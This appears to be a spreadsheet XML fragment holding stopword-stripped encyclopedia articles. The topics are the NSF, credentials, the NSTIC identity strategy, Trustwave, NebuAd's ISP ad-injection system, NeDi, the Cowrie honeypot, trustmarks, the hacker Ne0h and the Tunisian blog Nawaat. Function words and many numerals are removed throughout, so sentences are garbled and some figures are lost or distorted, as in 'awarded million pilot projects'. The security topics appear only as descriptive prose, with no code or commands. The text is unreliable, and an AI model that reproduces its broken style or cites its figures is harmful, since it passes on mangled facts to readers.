graduate school. undergraduates receive funding research experiences undergraduates summer programs. graduate students supported integrative graduate education research traineeships (igert) alliance graduate education professoriate (agep) programs graduate research fellowships, nsf-grf. k–12 community college instructors eligible participate compensated research experiences teachers programs. addition, early career-development program (career) supports teacher-scholars effectively integrate research education within mission organization, foundation lifetime integrated contributions. scope organization broadly organized four offices, seven directorates, national science board. employs 2,100 people permanent, temporary contractual positions headquarters alexandria, virginia. prior 2017, headquarters located arlington, virginia.in addition around 1,400 permanent employees staffs office office inspector general, workforce includes scientists temporary duty contract workers. scientists research institutions join temporary program directors, called "rotators", overseeing merit review process searching funding opportunities. these assignments typically last years, extend also offers contracting opportunities. 2018, existing contracts. offices office director office inspector general office budget, finance, award management office information resource managementthe also supports research several offices within office director, including office cyberinfrastructure, office polar programs, office integrative activities, office international science engineering. research directorates organizes research education support seven directorates, encompassing several disciplines: biological sciences (molecular, cellular, organismal biology, environmental science) computer information science engineering (theoretical computer science, fundamental hardware software, systems networking, artificial intelligence) engineering (bioengineering, environmental systems, civil mechanical systems, chemical transport systems, electrical communications systems, design manufacturing) geosciences (geological, atmospheric ocean sciences) mathematical physical sciences (mathematics, astronomy, physics, chemistry materials science) social, behavioral economic sciences (neuroscience, management, psychology, sociology, anthropology, linguistics, science science policy economics) education human resources (science, technology, engineering mathematics education every level)an eighth directorate, directorate technology, innovation partnerships (tip), created 2022 accelerate transition basic research real world impact. primary goal support use-inspired research translation research results market society. overseas sites prior october 2018, maintained three overseas offices promote collaboration science engineering communities united states continents' scientific communities: brussels europe, formerly based paris (established 1984; relocated brussels 2015) tokyo east asia, except china (established 1960) beijing china (established 2006)all three overseas offices shut october 2018, reflect agency's move nimble international posture. rather maintain dedicated offices, dispatch small teams specific international institutions. teams work week on-site evaluate research explore collaborations institution. crosscutting programs addition research funds specific disciplines, launched number projects coordinate efforts experts many disciplines, often involve collaborations u.s. federal agencies. examples include initiatives nanotechnology science learning digital libraries ecology infectious diseases national center science engineering statistics nsf's national center science engineering statistics (ncses) gathers data surveys partnerships agencies offer official data american science engineering workforce, graduates advanced u.s. science engineering programs, expenditures u.s. industry. ncses principal u.s. statistical agencies. part nsf's social, behavioral economic sciences directorate (sbe). criticism 2011, republican senator coburn released 73-page report, "national science foundation: under microscope", receiving immediate attention media outlets york times, news, msnbc. report found fault various research projects critical social sciences. started controversy political bias congressional inquiry federally sponsored research. 2014, republicans proposed bill limit board's authority grant-writing. 2013, funded work mark carey university oregon $412,930 grant, included study concerning gender glaciological research. after january 2016 release, drew criticism alleged misuse funding.some historians science argued national science foundation 1950 unsatisfactory compromise many clashing visions purpose scope federal government. certainly primary government agency funding basic science, supporters originally envisioned aftermath world 1950, support major areas research already become dominated specialized agencies national institutes health (medical research) u.s. atomic energy commission (nuclear particle physics). that pattern would continue 1957 u.s. anxiety launch sputnik creation national aeronautics space administration (space science) defense advanced research projects agency (defense-related research). also american association advancement science capital jury project c-more, center microbial oceanography: research education, science technology center international council nanotechnology mid-infrared technologies health environment (mirthe) (largely based princeton university national digital information infrastructure preservation program national digital library program (ndlp) research council scientific literacy science technology policy institute seddb, online database sediment geochemistry u.s. civilian research development foundation united states national academy sciences usa.gov references further reading oral history interview bruce barnes, 26-sep-1990 charles babbage institute, university minnesota. barnes describes duties program director nsf. provides brief overviews examples nsf's support research theoretical computer science, computer architecture, numerical methods, software engineering, development networking. describes nsf's support development computing facilities 'coordinated experimental research program'. science engineering indicators published biannually since 1972 national science board, provides quantitative information u.s. international science engineering enterprise. mark solovey. 2020. social science what?: battles public funding "other sciences" national science foundation. press. external links official website national science foundation federal register igert terrafly autopilot walk metro offices historic technical reports national science foundation (and federal agencies) available technical report archive image library (trail) "u.s. lawmakers unveil bold $100 billion plan remake nsf", science (may, 2020)</t>
  </si>
  <si>
    <t>Credential</t>
  </si>
  <si>
    <t>credential piece document details qualification, competence, authority issued individual third party relevant facto authority assumed competence examples credentials include academic diplomas, academic degrees, certifications, security clearances, identification documents, badges, passwords, user names, keys, powers attorney, sometimes publications, scientific papers books, viewed similar credentials people, especially publication peer reviewed made well-known journal reputable publisher. types documentation credentials person holding credential usually given documentation secret knowledge (e.g., password key) proof credential. sometimes proof copy held third, trusted party. while cases credential simple paper membership card, cases, diplomas, involves presentation letters directly issuer credential faith person representing negotiation meeting. counterfeiting credentials constant serious problem, irrespective type credential. great deal effort goes finding methods reduce prevent counterfeiting. general, greater perceived value credential, greater problem counterfeiting greater lengths issuer credential must prevent fraud. diplomacy diplomacy, credentials, also known letter credence, documents ambassadors, diplomatic ministers, plenipotentiary, chargés d'affaires provide government accredited, purpose, chiefly, communicating latter envoy's diplomatic rank. also contains request full credence accorded official statements. until credentials presented found proper order, envoy receives official recognition.the credentials ambassador minister plenipotentiary signed head state, chargé d'affaires foreign minister. diplomatic credentials granted withdrawn pleasure issuing authority, based widely varying criteria. receiving government reject diplomat’s credentials declining receive them, practice rarely happens. medicine medicine, process credentialing detailed review permissions granted medical doctor, physician assistant nurse practitioner every institution worked past, determine risk profile institution. vets practitioner receiving practice insurance ability bill insurance patient care. well, certifies legal administrative body requirements, joint commission. medical practitioners must also credentials form licenses issued government jurisdictions practice, obtain suitable education, training, and/or practical experience. most medical credentials granted practice specific group. they also withdrawn event fraud malpractice holders. typically require continuing education validation renewal continue practice. information technology information systems commonly credentials control access information resources. classic combination user's account number name secret password widely used example credentials. increasing number information systems forms documentation credentials, biometrics (fingerprints, voice recognition, retinal scans), x.509, public certificates, cryptography credentials cryptography establish identity party communication. usually take form machine-readable cryptographic keys and/or passwords. cryptographic credentials self-issued, issued trusted third party; many cases criterion issuance unambiguous association credential specific, real individual entity. cryptographic credentials often designed expire certain period, although mandatory. x.509 public certificate example cryptographic credential. operator licensing operators vehicles automobiles, boats, aircraft must credentials form government-issued licenses many jurisdictions. often documentation license consists simple card certificate operator keeps person operating vehicle, backed archival record license central location. licenses granted operators period successful training and/or examination. this type credential often requires certification good health also require psychological evaluations screening substance abuse. operator licenses often expire periodically must renewed intervals. renewal simply formality, require round examinations training. security clearances military government organizations, private organizations, system compartmentalizing information exists prevent uncontrolled dissemination information considered sensitive confidential. persons legitimate need access information issued security clearances, tracked verified ensure unauthorized persons gain access protected information. security clearances among carefully guarded credentials. often granted individuals lengthy investigation need access protected information adequately justified issuing authority. elaborate security-clearance systems found world's military organizations. some credentials type considered sensitive holders even permitted acknowledge (except authorized parties). documentation security clearances usually consists records keep secure facility verifiable demand authorized parties. breaches security involving security clearances often punished specific statutory law, particularly occur context deliberate espionage, whereas counterfeiting misuse credentials punished used deliberate intent defraud specific contexts. security clearances regularly withdrawn longer justified, person holding determined great security risk. journalism many democratic nations, press credentials required national federal level publication kind. however, individual corporations, certain government military entities require press credentials, press pass, formal invitation members press grants rights photographs videos, press conferences, interviews. press credentials indicate person verified working known publication, holding press pass typically allows person special treatment access rights. some governments impose restrictions work journalist, requiring anyone working press carry government-issued credentials. restricting press credentials problematic limitations freedom press, particularly government leaders selectively grant, withhold, withdraw press credentials disallow critique government policy. press coverage published governments restrict journalism often treated skepticism others, considered truthful informative propaganda. trade credentials some trades professions jurisdictions require special credentials anyone practicing trade profession. these credentials associated specific competencies skills. cases, exist mainly control number people allowed exercise trade profession, order control salaries wages. persons acting merchants, freelancers, etc., require special credentials jurisdictions well. here again, purpose mainly control number people working way, sometimes also track tax-reporting purposes like people evaluation. academic professional credentials academic professional world makes extensive credentials, diplomas, degrees, certificates, certifications, order attest completion specific training education programs students, attest successful completion tests exams, provide independent validation individual's possession knowledge, skills, ability necessary practice particular occupation competently, (for example: arun paul msw, mphil). documentation academic professional credentials usually consists printed, formal document. issuing institution often maintains record credential well. academic credentials normally valid lifetime person issued. professional certifications normally valid limited number years, based pace change certified profession, require periodic re-certification re-examination demonstrate continuing competency occupational standards practice evolve) continuing professional development demonstrate continually enhanced competency).acquisition credentials often leads increased economic mobility work opportunity, especially low-income people. general term academic credentials form resume curriculum vitae, often abbreviated titles titles credentials identify person belonging specific group, nobility aristocracy, specific command grade military, largely symbolic ways. they associated specific authority, usually attest specific competence skill (although associated credentials do). partial list titles includes personal titles, lord, knight, right honourable, indicating earned inherited rank position within formal power structure; command ranks, captain, sergeant, etc., indicating likewise specific position command hierarchy, e.g. police rank military rank; academic degree professional designation phd, euring, p.eng m.d., whether purely honorary symbolic, associated credentials attesting specific competence, learning, skills; labor union club memberships; persons allowed access specific areas special events, concerts shows; citizenship, case passports birth certificates. also access badge access control common access card credit card 2009 card digital credential keycard magnetic stripe microdegree physical security proximity card smart card swipe card online credentials learningdynamics: credentialism educational inflation references</t>
  </si>
  <si>
    <t>National Strategy for Trusted Identities in Cyberspace</t>
  </si>
  <si>
    <t>national strategy trusted identities cyberspace (nstic) government initiative announced april 2011 improve privacy, security convenience sensitive online transactions collaborative efforts private sector, advocacy groups, government agencies, organizations.the strategy imagined online environment individuals organizations trust identify authenticate digital identities digital identities organizations devices. promoted offer, mandate, stronger identification authentication protecting privacy limiting amount information individuals must disclose. description strategy developed input private sector lobbyists, including organizations representing business groups, nonprofit federal advisory groups, comments dialogue public. strategy four guiding principles: privacy-enhancing voluntary secure resilient interoperable cost-effective easy use.the nstic described vision compared ecosystem individuals, businesses, organizations enjoy greater trust security conduct sensitive transactions online. technologies, policies, agreed upon standards would securely support transactions ranging anonymous fully authenticated high value imagined world. implementation included three initiatives: identity ecosystem steering group (idesg), private sector-led organization developing identity ecosystem framework; funding pilot projects nstic said embrace advance guiding principles; federal cloud credential exchange (fccx), u.s. federal government service government agencies accept third-party issued credentials approved ficam scheme.nstic announced presidency barack obama near first term april 2011. magazine article said individuals might validate identities securely sensitive transactions (such banking viewing health records) stay anonymous (such blogging surfing web).in january 2011 u.s. department commerce established national program office (npo), national institute standards technology, help implement nstic. coordinate implementation activities federal agencies, works white house cybersecurity coordinator, originally howard schmidt 2012 michael daniel. steering group nstic called steering group private sector administer development adoption framework. this identity ecosystem steering group (idesg) held meeting chicago august 15–16, 2012. meeting brought together members person members remotely. additional plenary meetings phoenix, arizona, santa clara, california boston, massachusetts. under grant 2012 2014, trusted federal systems, inc. group's administrative body. pilots federal government initiated supported pilot programs. 2012, nstic awarded million pilot projects first year. example, american association motor vehicle administrators developing demonstration commercial identity provider credentials virginia state government, including securely verifying identities online virginia department motor vehicles. internet2 received $1.8 million research. id.me given two-year grant 2013.further work funded nist trusted identities group page. federal cloud credential exchange nstic called u.s. federal government agencies early adopters identity ecosystem envisioned nstic. agencies struggled implement services provide internally externally. technical, policy cost barriers made challenging accept third-party credential providers accredited federal identity, credential, access management (ficam) initiative.in response, white house created federal cloud credential exchange (fccx) team, co-chaired nstic general services administration. team consisted representatives agencies whose applications accessed large population external customers. november 2012, united states postal service chosen manage pilot version fccx, awarded contract build securekey technologies, member fido alliance. that contract renewed may, 2015. connect.gov connect.gov launched december, 2014, manifestation pilot. first companies provide individual citizens identity management services compatible connect.gov, id.me verizon. ping identity forgerock first software platforms provide ficam-compliant credentials, enable private sector organizations connect securely government agencies, primary objective project. login.gov 2016, announced blog entry connect.gov would replaced. replacement system would called login.gov launched april 2017. identity ecosystem steering group identity ecosystem steering group (idesg) received start funding nist 2010 since created series documents available site. 2016 introduced identity ecosystem framework (idef) registry self-assessment. criticism proposal generated criticism since released draft form june 2010. much centered around privacy implications proposal. shortly draft's release, electronic privacy information center (epic), consumer-rights civil liberties organizations, sent committee statement response draft nstic policy, requesting clearer complete plan create safeguard internet users' rights privacy. while epic head, marc rotenberg, called nstic "historic," also cautioned "...online identity complex problem risk 'cyber-identity theft' consolidated identity systems real. need protect online privacy."nstic addressed early privacy concerns 2013 fair information practice principles document. subsequent initiatives sought advance privacy. example, american civil liberties union electronic frontier foundation involved privacy committee idesg. references external links official website</t>
  </si>
  <si>
    <t>Trustwave Holdings</t>
  </si>
  <si>
    <t>trustwave holdings american standalone business unit cybersecurity brand singaporean telecommunications company singtel group enterprise. focuses providing managed detection response (mdr), managed security services (mss), database security, email security organizations around globe. company's international headquarters located downtown chicago, regional offices located london, paulo, sydney. company also operates security operations centers chicago, denver, manila, minneapolis, singapore, sydney, tokyo, warsaw, waterloo, ontario.trustwave customers countries. history april 2011, trustwave holdings filed though company standalone subsidiary singtel. trustwave's website says company 1,600 employees.in february 2014, trustwave phillip. smith offered expert testimony related data breaches malware part congressional hearing house committee energy commerce. prepared testimony, presented observations based company's experience investigating thousands data breaches, ongoing malware security research forms threat intelligence.on april 2015 (sgt), singapore telecommunications (singtel) announced entered definitive agreement acquire trustwave holdings, inc. $810 million—singtel stake company leaving trustwave's president. according media reports singtel filings singapore exchange, enterprise value trustwave time deal $850 million.in october 2021, trustwave sold compliance business cybersecurity firm sysnet million. sale gave trustwave ability invest core capabilities managed detection response (mdr) managed security services (mss), according research firm idc. significant discoveries 2013 2014 trustwave spiderlabs analysis primary pony botnet controllers. results analysis found botnets gathered million passwords credentials accounts payroll, facebook, twitter, yahoo more, $220,000 crypto-currency like bitcoin.in june 2020, trustwave spiderlabs discovered malware family, named goldenspy, embedded payment software chinese bank requires corporations install conduct business operations china. trustwave said uncertain whether malware embedded software deployed specific targets. sent subsequent warning malware threat companies healthcare, chemical, finance industries. leading 2020 u.s. presidential election, trustwave spiderlabs found hacker selling info million u.s. voters dark cybercriminal forum research. trustwave turned information fbi. february 2021, trustwave spiderlabs discovered "severe" vulnerabilities solarwinds orion. flaws could’ve allowed hacker gain complete remote control targeted solarwinds system. patches released january customers solarwinds urged patch immediately. criticism trustwave operates x.509 certificate authority ("ca") used level trust many browsers, operating systems, applications "trusted root ca"). 2011, trustwave sold certificate subordinate allowed customer present certificates identifying arbitrary entities, similar mechanism "man middle attack". this type action similar practice running proxy corporate network, though case public subordinate (valid anywhere) used instead internal corporate-generated domain (valid machines accept part organizational policy), making risk abuse much higher. march 2014, trustwave named lawsuit filed trustmark national bank green bank n.a. lawsuit alleges trustwave failed provide promised level security target, failing meet industry security standards. april 2014, notice dismissal filed plaintiffs, effectively withdrawing earlier allegations. recognition 2019, trustwave named leader gartner magic quadrant managed security services, worldwide. august 2019, trustwave threat indicator contributor award microsoft. trustwave named winner best managed security service category awards second consecutive year february 2020.in march 2020, trustwave named leader marketscape: asia/pacific managed security services 2020 vendor assessment marketscape: asia/pacific professional security services advisory, assessment, awareness 2020 vendor assessment. august 2020, trustwave named leader forrester wave: global managed security services providers, 2020 report. trustwave joined microsoft intelligent security association (misa) april 2021. march 2021, trustwave named strong performer "providers that matter most" clients terms current capability forrester wave managed detection response (mdr). trustwave recognized microsoft security 20/20 partner award winner managed 2021. references</t>
  </si>
  <si>
    <t>NebuAd</t>
  </si>
  <si>
    <t>nebuad american online advertising company based redwood city, california, offices york london funded investment companies sierra ventures menlo ventures. several companies originally developed behavioral targeting advertising systems, sought deals isps enable analyse customer's websurfing habits order provide relevant, micro-targeted advertising. phorm similar company operating europe. adzilla project rialto also appear developing similar systems. point, nebuad signed customers, mostly internet access providers, agreements providers covered percent broadband users america. fallout following public congressional concern, nebuad's largest customers pulled out. nebuad closed business august 2008, followed 2009. nebuad dissolved february 2010. overview nebuad's platform comprised three main parts: hardware, hosted within isp, capable inserting content pages, off-site server complex analyse categorise contents users' internet communications, relationships advertising networks willing present nebuad's targeted advertising.the system consisted hardware device installed within client network. each device capable monitoring 50,000 users. users could "opt-out" nebuad's information collection targeted ads, users prevent isps sending data nebuad first place.since isps route customers' traffic, important vantage point monitor traffic to-and-from consumer using deep packet inspection (dpi). analysing traffic, nebuad reported gained information customers' particular interests, less intrusive methods. nebuad's privacy policy claimed "specifically store information relating confidential medical information, racial ethnic origins, religious beliefs, sexuality, tied personally identifiable information ('sensitive personal information')." also advises, "the information collect stored processed nebuad's servers united states. result, information subject access requests governments, courts enforcement." least customers middle america isp, wow! noticed unexpected cookies appearing sites nebuad.adjuggler.com, using google, read written, wow's support department contacted, initially denied responsibility activity. after noticing problems google loading slowly, creation non-google cookies, customer spent hours trying disinfect machine, incorrectly thought infected spyware, but, proved ineffective, resorted reinstalling machine's scratch, discover problem away.on july 2008, suspended nebuad services subscribers. according nebuad's sales, less users opt-out. expected earn least $2.50 month user.nebuad bought impressions networks including valueclick.nebuad argued behavioral targeting enriches internet several fronts. firstly, website owners offered improved click-through rate (ctr), could increase profits, reduce amount page-space dedicated advertising. owners previously thought ad-unfriendly websites offered chance make money subject matter website, interests visitors. advertisers offered better targeted adverts, hence reducing "scattergun approach" (publishing many possible, hope catching client) users offered relevant adverts. isps paid allowing nebuad access network per-user per-active profile basis. nebuad used data search terms, page views, page clicks, time spent specific sites, code, browser info connection speed categorise user's interests. nebuad access user identification information isp, able discover traffic monitoring (for example, email traffic email address address). dykes, nebuad claimed 2008; [consumer interest segments] today we're expanding multiple thousands". controversies generally, nebuad provided additional revenue network operators, maintain lower consumers' internet access bills. critics targeted advertising believe content internet communications entrusted handling without inspected, modified, sale. privacy advocates criticize lack disclosure isps provided, prior partnering nebuad, weak opt-out method, lack oversight third-party company contents internet communications, conflicts united states wiretap laws, company's refusal name partner isps. consumer notification february 2008, american cable operator, wide open west (wow) started rolling nebuad. roll-out completed first week march 2008. updated terms conditions include mention nebuad, cases informed customers terms updated. however, customers explicitly notified nebuad later, sometime third week march 2008.in response inquiry members united states house representatives telecommunications subcommittee pilot test nebuad's services, embarq said notified consumers revising privacy policy weeks prior sending users' data streams nebuad.a knology user knoxville, tennessee reported notified internet monitored.in 2008, charter communications announced planned monitor websites visited customers partnership nebuad. customers voiced concerns, charter changed mind june. friction staff management plans implement nebuad agree isp's employees, including employee planned re-route traffic avoid nebuad's deep packet inspection hardware, altogether. members congress, markey, chairman house subcommittee telecommunications internet, barton, ranking member house committee energy commerce, argued services must opt-in comply provisions laid section communications act, wrote charter request suspend test: respectfully request move forward charter communications' proposed venture nebuad opportunity discuss issues raised proposed venture."a writer wired news questioned whether charter users could really monitored able receiving targeted ads. writer asked would breach anti-wiretapping laws.an engineer examined system confirmed nebuad's monitoring. inbound outbound information intercepted sent nebuad's offsite server processed. even user opted service, prevent sending data nebuad. packet forgery browser exploits report robert topolski, chief technology consultant free press public knowledge, showed nebuad's devices created cookies end-users machines injecting specious packet data stream returned response page requests submitted search engines, including google yahoo. content specious packet, would added page rendered end-user's browser, contained html script tags cause browser request javascript hugedomains.com. superimposing adding advertising webpages critics concerned nebuad superimposed advertising advertisers, placing additional advertising page. these concerns originated nebuad's "fair eagle" operation, patent application data mentioned inventions, loose relationship claria corporation whose products history suggest tactics, well following: 2007 reported redmoon, texas-based using nebuad technology inject redmoon's advertising pages visited users. "fair eagle" advertisement hardware, provided nebuad, inserted additional advertising alongside content pages. featured window "fair eagle" title bar. injected stopped appearing toward june, 2007. relationship claria corporation some senior staff members nebuad worked previously (now defunct) company, named claria corporation (formerly, gator corporation), well known software known gator. both claria nebuad located redwood city, california. june 2006 creation nebuad.com coincides timing claria's decision shut gator service. nebuad repeatedly denied corporate connection claria, describing hiring claria employees result company shedding employees tight market experienced advertising sales staff valley. partners isps tried deployed prepared deploy nebuad included following: following isps listed legal documents related class action notice (see below) deployed nebuad hardware: isps ended suspended relationship nebuad. charter communications suspended plans test nebuad following scrutiny lawmakers privacy groups. embarq spokesperson told associated press ended trial nebuad, decided whether move forward behavioral targeting advertising "either nebuad vendor". centurytel, earliest known isps test nebuad, notified customers late 2008 deploying hardware, pull deal alongside charter month later. bresnan communications used nebuad technology. following announcements charter, embarq, centurytel would longer nebuad networks, bresnan told blogger nebuad trial ended would comply whatever regulatory model emerges current debate. cache evidence indicated blackfoot telecommunications group, inc. missoula, montana appeared tried nebuad march 2008. blackfoot's mary worden later explained, "blackfoot tested nebuad internal corporate network, employees customers, march 2008, similar concerns raised consumer groups elected launch service." nexicom, serving central ontario kawarthas, canada, notified users privacy policy page using nebuad april 2008. following question users public forum, nexicom's paul stewart replied, "nexicom investigating using nebuad service. software never implemented time concerns several levels regarding privacy issues. references nebuad nexicom's privacy policy removed." wide open west (wow) completed suspension nebuad services july response customer inquiries, indicated, "with congress active review online behavioral advertising, wow! internet- cable- phone suspending deployment nebuad services subscribers time. believe parties best served thoughtful thorough review emerging advertising model, welcome opportunity discussion take place." knology reported united states house committee energy commerce discontinued trial nebuad markets july 2008. unbeknownst users, cable conducted nebuad tests 14,000 customers alabama months beginning november 2007. august 2008, cable decided using technology "commercially" systems september said waiting "clear rules boundaries". closure nebuad closed august 2008 2009. class-action lawsuit proposed settlement class-action lawsuit nebuad underway october 2011. subscribers isps listed january 2007, july 2008, considered mandatory class members could choose out. under terms proposed settlement, nebuad would create settlement fund approximately $2,410,000, used administration settlement, covering legal fees, incentive award $5,000 individual brought complaint, providing $1000 named representatives, money going support non-profits providing consumer education privacy research. references external links valentine nebuad, inc. settlement information</t>
  </si>
  <si>
    <t>NeDi</t>
  </si>
  <si>
    <t>introduction nedi open source software tool discovers, maps inventories network devices tracks connected end-nodes. contains features user-friendly managing enterprise networks. example: address mapping/tracking, traffic error graphing, uptime monitoring, correlate collected syslog trap messages customizable notification, drawing network maps, extensive reporting features device software, usage, disabled interfaces, link errors, switch usage many more. modular architecture allows simple integration tools. example, cacti graphs created purely based discovered information. nedi's versatility things like printer resources monitored well. features network discovery, management monitoring netflow sflow based traffic analysis inventory lifecycle management network topology visualisation locate track computers security audits management printer management backup configs reports history development started 2001 paul scherrer institute remo rickli. released public gpl2 2003. over next decade, nedi grew reasonable network management suite help community partners. 2014 remo rickli founded nedi consulting, providing commercial support development around nedi. since major update released every year (e.g. 2015). accessibility access latest version bought support, yearly subscription basis. last year's version released public gpl3. some premium modules included free "community edition". also rrdtool, used graphs d3.js, used dynamic maps (interactive force directed graphs) leaflet (software), used geographic maps comparison network monitoring systems references external links official website community forum facebook page youtube tutorials</t>
  </si>
  <si>
    <t>Cowrie (honeypot)</t>
  </si>
  <si>
    <t>cowrie medium interaction telnet honeypot designed brute force attacks shell interaction performed attacker. cowrie also functions telnet proxy observe attacker behavior another system. cowrie developed kippo. reception cowrie referenced published papers. book "hands-on ethical hacking network defense" includes cowrie list commercial honeypots. prior uses discussing honeypot effort called project heisenberg cloud rapid7, rudis, company's chief data scientist, told eweek, "there custom rapid7-developed low- medium-interaction honeypots used within framework, along open-source ones, cowrie." doug rickert experimented open-source cowrie honeypot wrote medium. putting simple honeypot isn’t difficult, many open-source products besides cowrie, including original honeyd mongodb nosql honeypots, ones emulate servers. some appear scada advanced applications. best practices researchers sysadmin, audit, network security (sans) institute urged administrators security researchers latest version cowrie honeypot monitor shifts type passwords scanned pattern attacks devices. discussion resources attack detection forensics using honeypot environment calls cowrie "medium interaction honeypot" describes results using days capture "all communicated sessions files." book advances data science also devotes chapter "cowrie honeypot dataset logging." iccws 2018 13th international conference cyber warfare security describes using cowrie. move meaningful internet systems: 2019 conferences includes details using cowrie. splunk, security tool receive information honeypots, outlines honeypot using open-source cowrie package. references external links official website</t>
  </si>
  <si>
    <t>Trustmark (commerce)</t>
  </si>
  <si>
    <t>trustmark image, logo, badge typically displayed e-commerce website, indicating site passed certain digital security tests operated member professional organization. trustmark intended show approval brand recognizable third party. customers gain confidence inclined transact business brand bearing trustmark.one oldest familiar trustmarks, good housekeeping seal approval, established 1909 magazine's research institute endorse specific products backed two-year warranty. modern era, digital trustmarks machine-readable authentication feature within identity trust framework.in united kingdom since 2006, non-profit entity called trustmark master agreement department business, energy industrial strategy licenses audits businesses register carry work inside near residential homes. canada, trustmark issued canadian centre philanthropy (now imagine canada) identify charities meet standards ethics accountability. 2018, mozilla consortium including york university school backed product packaging trustmark called trustable technology. truste (now trustarc) another specialist trustmark review services. also privacy seal trust seal trust signals references</t>
  </si>
  <si>
    <t>Ne0h</t>
  </si>
  <si>
    <t>ne0h canadian hacker received mass media attention 1999 affiliation hacker group globalhell, featured kevin mitnick's book intrusion parker's book cyber adversary characterization: auditing hacker mind.his real identity unknown. references external links list globalhell attacks 1998–1999 archive first media attention toward ne0h's hacks john vranesevich, antionline september 1999 hacker shows just easy really attrition staff june 1999 highlights kevin mitnick's book intrusion adaptation, profiles deception november 2004 highlights parkers book cyber adversary characterization auditing hacker mind</t>
  </si>
  <si>
    <t>Nawaat</t>
  </si>
  <si>
    <t>nawaat (arabic: نواة) independent collective blog co-founded tunisians sami gharbia, sufian guerfali riadh guerfali 2004, malek khadraoui joining organization 2006. goal nawaat's founders provide public platform tunisian dissident voices debates. nawaat aggregates articles, visual media, data variety sources provide forum citizen journalists express opinions current events. site receive donations political parties. during events leading tunisian revolution 2011, nawaat advised internet users tunisia arab nations dangers identified online offered advice circumventing censorship. nawaat arabic word meaning core. nawaat received numerous awards international media organizations wake arab spring wave revolutions throughout middle east north africa. history early years nawaat co-founded sami gharbia, sufian guerfali riadh guerfali. site went online april 2004, forum tunisian citizens diaspora able express free censorship government zine el-abidine ali. since launch, site posted thousands print visual media items focused human rights, freedom press, politics, culture tunisia, primarily french arabic languages also frequently english language contributions. government established tunisian internet agency (ati) 1996 monitor internet communications within borders tunisia. because nawaat's frequent challenges tunisian government's restrictions internet communications, became target censors shortly inception. opennet initiative survey 2006-2007 indicated tunisian government blocking nawaat several dissident sites. would block users' attempts access nawaat smartfilter software manufactured united states company secure computing, displaying standard "file found" error message browsers. some nawaat's earliest contributions focused election fraud forms disenfranchisement re-election 2004, incumbent 94.49% popular vote. addition, nawaat aggregated variety commentaries exploring role islam government contemporary relations arab nations western world. nawaat also featured contributions human rights advocates arab world well iran nations large muslim populations. site's staff often wrote opinion pieces castigating arab governments harsh censorship laws promoting anti-censorship initiatives. editors also called regularly release imprisoned free-speech advocates including alaa el-fattah abdel monem mahmoud. coverage self-immolation mohamed bouazizi sidi bouzid riots mohamed bouazizi, tunisian street vendor, fire december 2010, resulting eventual death january 2011. this event catalyzed series street protests starting town sidi bouzid became tunisian revolution. nawaat provided commentary contextualized unfolding events posted numerous articles unfolding events, many tunisians able access mirror sites conduits. nawaat covered spread protests zine el-abidine fled country family, posting news stories international news sources, arab journalists, tunisians inside country abroad. site kept focus underlying causes revolution well, including restrictions personal freedoms, imprisonment opposition members, economic stagnation. tunileaks tunileaks launched november nawaat.org, hour whistle-blowing site wikileaks unleashed cables tunisia. first release contained cables issued embassy tunisia, majority revealed exchanges embassy state department. those revelations mainly dealt neglect human rights tunisia restrictions freedom expression. tunisian government rapidly blocked access tunileaks, first blocking https://web.archive.org/web/20150221084506/https://tunileaks.appspot.com/ (without https), next blocked google engine's address (209.85.229.141) order block tunileaks https well. additionally, electronic version akhbar, lebanese newspaper, also censored tunisia containing cables released tunileaks. other support revolution nawaat's innovative contributions revolution identifying translating videos personal accounts potential media interest distributed facebook social networking sites. time ali's ouster, facebook sites blocked government protesters could post accounts revolution. tunisian dialect sites' videos made unintelligible many native speakers arabic, nawaat staff's translation efforts resulted many videos protests tunisian security service crackdowns broadcast al-jazeera international news outlets. nawaat affiliates made utilized posterous blogging platform distribute material international press. al-jazeera banned country government videos provided nawaat reliable sources valuable video footage revolution. nawaat also utilized extensive network internet activists assist mobilization protesters social media. sami gharbia noted goals nawaat bridge collective action social media traditional protest movement tactics. post-revolution activities ali's flight tunisia, sites previously blocked available tunisian internet users. ati, still functioning agency revolution, ceased censorship opposition sites following months began blocking sites deemed pornographic inciting violence. direction military tribunal, five facebook sites criticizing army blocked 2011. nawaat continued monitor activities ati, still staffed employees era. addition, nawaat focused efforts training activists internet technology, assisting ngos similar missions, monitoring elections, continuing publish content human rights social issues. nawaat staff created first tunisian hackerspace, space collaborative internet technology projects discussed among members arab internet activist community along worldwide partners. hackerspace initiatives included promotion arabic language wikimedia proliferation. nawaatleaks march 2014, nawaat.org launched anonymous whistleblowing initiative order support transparency spot corruption. initiative based globaleaks platform technology accessible arabic french. collaboration globaleaks, nawaat team created special page deploys number open source applications techniques protect leaking confidential documents files. this software even protects whistleblowers nawaat team itself, thanks techniques able identify identity leak information address emails, addresses, names geographic locations. provide protection, nawaat team usual publication leaked confidential document, delete meta data increases possibility identifying electronic source documents different formats: audio, video clips, photos texts. facts figures nawaat.org ranks 54916 internet traffic alexa. site receives average 87,244 page views day. estimated worth nawaat.org us$15,479 according valueis. notable founders sami gharbia, co-founders nawaat.org. blogger civil society advocate. listed foreign policy magazine's most influential global thinkers 2011, shares 24th rank daniel domscheit-berg former deputy wikileaks founder julian assange) russian lawyer alexey navalny. gharbia known connecting ethan zuckerman's global voices project, founding tunileaks, exclusive wikileaks tunisia, bringing wikileaks closed society pre-revolutionary tunisia, pumping nawaat group blog.riadh guerfali prizewinning tunisian blogger, also known online name "astrubal". received netcitizen prize awarded french press freedom campaigners reporters without borders (rsf) internet giant google, work promote freedom expression internet. awards nawaat many major awards starting 2011 role played prior tunisian revolution after. reporters without borders netizen prizenawaat awarded reporters without borders netizen prize, world against cyber-censorship. award goes netizen, blogger, online journalist, cyber-dissident helped promote freedom expression internet. winner receives 2,500 euros prize. nawaat finalists bahrain, belarus, thailand, china, vietnam. this annual award sponsored google. index censorship awardnawaat "the index censorship media award" project tunileaks, joint project wikileaks dealt tunisian affairs confirmed, cold documents, widely criticised corruption president ali's regime, helped focus public discontent. electronic frontier foundation 2011 pioneer award digital power index 2012 nawaat awarded national union tunisian journalists (snjt) best interactive website prize 2015. arab econtent award declined nawaatnawaat arab econtent award e-inclusion participation category, initiative world summit award (wsa). nawaat declined award, however, refused attend bahrain expo 2011 opening ceremony receive deputy prime minister bahrain chairman supreme committee information technology communications, sheikh mohammed mubarak khalifa. this protest bahrain’s internet filtering practices, arrest bloggers human rights activists, blocking websites blogs criticize bahraini government ruling family. references links references external links nawaat nawaatleaks opennet initiative hackerspace</t>
  </si>
  <si>
    <t>Trusted system</t>
  </si>
  <si>
